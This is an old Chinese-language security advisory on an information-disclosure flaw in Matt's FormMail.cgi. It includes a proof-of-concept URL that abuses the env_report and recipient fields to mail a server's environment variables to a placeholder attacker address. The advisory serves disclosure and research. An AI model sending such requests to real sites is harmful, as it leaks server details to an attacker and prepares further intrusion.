发布日期：2000-05-11
更新日期：2000-05-11

受影响系统：

Matt FormMail.cgi

描述：

---

Formmail.cgi包含一个调试的字段env_report,它的值是一系列的环境变量，这些环境变量
将被嵌入消息内部。由于Formmail.cgi没有检查收件人地址的完整性，导致收件人地址可以
被改变，因此消息可以被发给攻击者的账号，这样攻击者就可以获得环境变量的信息了。
攻击者可以利用这些信息进行下一步的攻击。

<* 来源：Black Watch Labs (www.perfectotech.com/blackwatchlabs/) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

下列URL将会将使用formmail.cgi的站点的环境变量内容发送到攻击者的信箱里去:


http://www.formmail.site/cgibin/formmail.cgi?env_report=PATH&recipient=attacker@attacker.site
&required=&firstname=&lastname=&email=&message=&Submit=Submit

建议：

---

暂无


浏览次数：5879
严重程度：0（网友投票）